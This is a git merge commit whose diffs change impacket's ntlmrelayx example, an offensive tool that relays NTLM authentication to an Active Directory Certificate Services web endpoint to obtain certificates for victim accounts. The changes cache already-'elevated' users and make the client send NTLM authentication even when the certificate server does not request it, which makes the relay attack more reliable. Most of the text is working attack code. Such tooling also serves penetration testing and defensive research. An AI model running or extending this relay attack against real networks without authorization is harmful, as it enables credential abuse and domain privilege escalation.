Merge pull request #1 from Tw1sm/ntlmrelayx-adcs-attack

Fix when cert server does not request NTLM auth

Author: ExAndroidDev

impacket/examples/ntlmrelayx/attacks/httpattack.py

@@ -21,6 +21,9 @@
 from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
 
 PROTOCOL_ATTACK_CLASS = "HTTPAttack"
+# cache already attacked clients
+ELEVATED = []
+
 
 class HTTPAttack(ProtocolAttack):
     """
@@ -62,6 +65,9 @@ def adcs_relay_attack(self):
         key = crypto.PKey()
         key.generate_key(crypto.TYPE_RSA, 4096)
 
+        if self.username in ELEVATED:
+            print('[*] Skipping user %s since attack was already performed' % self.username)
+            return
         csr = self.generate_csr(key, self.username)
         csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
         print("[*] CSR generated!")
@@ -77,6 +83,7 @@ def adcs_relay_attack(self):
         print("[*] Getting certificate...")
 
         self.client.request("POST", "/certsrv/certfnsh.asp", body=data, headers=headers)
+        ELEVATED.append(self.username)
         response = self.client.getresponse()
 
         if response.status != 200:

impacket/examples/ntlmrelayx/clients/httprelayclient.py

@@ -63,7 +63,10 @@ def sendNegotiate(self,negotiateMessage):
                 return False
         except (KeyError, TypeError):
             LOG.error('No authentication requested by the server for url %s' % self.targetHost)
-            return False
+            if self.serverConfig.isADCSAttack:
+                LOG.info('IIS cert server may allow anonymous authentication, sending NTLM auth anyways')
+            else:
+                return False
 
         #Negotiate auth
         negotiate = base64.b64encode(negotiateMessage).decode("ascii")